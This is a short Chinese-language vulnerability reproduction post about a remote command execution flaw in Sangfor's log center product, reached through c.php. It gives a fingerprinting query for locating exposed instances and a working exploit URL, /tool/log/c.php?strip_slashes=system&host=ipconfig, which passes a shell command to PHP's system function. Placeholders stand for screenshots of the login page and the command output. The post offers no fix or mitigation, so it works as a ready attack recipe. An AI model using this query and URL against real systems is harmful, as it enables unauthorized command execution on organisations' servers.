深信服 日志中心 c.php 远程命令执行漏洞

漏洞描述

深信服 日志中心 c.php 远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行。

漏洞影响

深信服 日志中心

网络测绘

body=”isHighPerformance : !!SFIsHighPerformance,”

漏洞复现

登录页面如下

20240403115912135-watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10-20220313131203508.98ce1c48_2024-04-03_11-59-01 (1)

访问漏洞Url

/tool/log/c.php?strip_slashes=system&host=ipconfig

20240403115956981-watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10-20220313131203577.bdcc52f1_2024-04-03_11-59-44 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容